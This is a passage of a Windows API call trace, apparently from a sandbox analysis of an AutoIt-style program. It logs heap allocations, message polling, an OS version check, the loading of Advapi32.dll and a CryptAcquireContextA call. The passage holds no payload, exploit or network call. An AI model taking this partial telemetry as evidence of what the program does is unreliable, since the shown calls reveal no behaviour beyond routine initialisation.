Flags=0x0, Size=0x4) returned 0x2e54e28 [0250.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0250.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0250.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0250.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0250.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0250.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0250.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0250.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0250.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0250.396] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0250.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0250.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0250.396] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0250.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0250.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0250.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51490 [0250.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0250.396] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0250.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0250.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0250.397] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0250.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0250.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0250.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514c0 [0250.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0250.397] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0250.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0250.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0250.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0250.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0250.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0250.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0250.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0250.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0250.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0250.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0250.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0250.397] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0250.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0250.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0250.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0250.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0250.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0250.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0250.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0250.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0250.397] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0250.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0250.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0250.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0250.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0250.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0250.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0250.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0250.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0250.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0250.398] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0250.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0250.398] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0250.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0250.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0250.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0250.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0250.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0250.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0250.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0250.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0250.399] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0250.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0250.399] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55df8 [0250.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0250.399] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0250.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55df8 | out: hHeap=0x970000) returned 1 [0250.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0250.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0250.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54be8 [0250.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0250.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0250.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0250.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0250.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512e0 [0250.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0250.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0250.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0250.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0250.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0250.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0250.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0250.399] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0250.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0250.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0250.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0250.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0250.400] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0250.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0250.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0250.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546e8 | out: hHeap=0x970000) returned 1 [0250.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0250.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0250.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0250.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0250.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0250.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0250.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0250.400] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0250.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0250.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0250.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0250.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0250.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0250.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0250.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0250.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0250.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0250.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0250.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0250.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0250.400] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0250.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0250.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0250.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0250.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0250.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0250.401] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.401] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0250.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0250.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0250.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0250.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0250.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0250.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0250.401] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0250.402] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0250.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0250.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0250.402] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0250.402] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0250.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0250.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e698c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0250.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0250.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0250.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69c28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0250.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0250.461] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0250.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0250.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0250.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0250.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0250.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0250.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0250.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0250.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0250.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0250.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0250.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0250.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0250.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0250.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0250.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0250.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0250.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0250.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0250.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0250.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0250.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0250.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0250.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0250.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0250.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0250.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0250.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0250.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0250.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0250.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0250.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0250.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0250.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0250.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0250.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0250.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0250.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0250.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0250.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0250.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0250.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0250.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0250.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0250.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0250.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0250.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0250.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0250.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0250.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0250.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0250.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0250.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0250.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0250.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0250.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0250.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0250.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0250.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0250.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0250.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0250.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0250.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0250.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0250.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0250.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0250.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0250.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0250.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0250.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0250.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0250.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0250.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0250.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0250.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 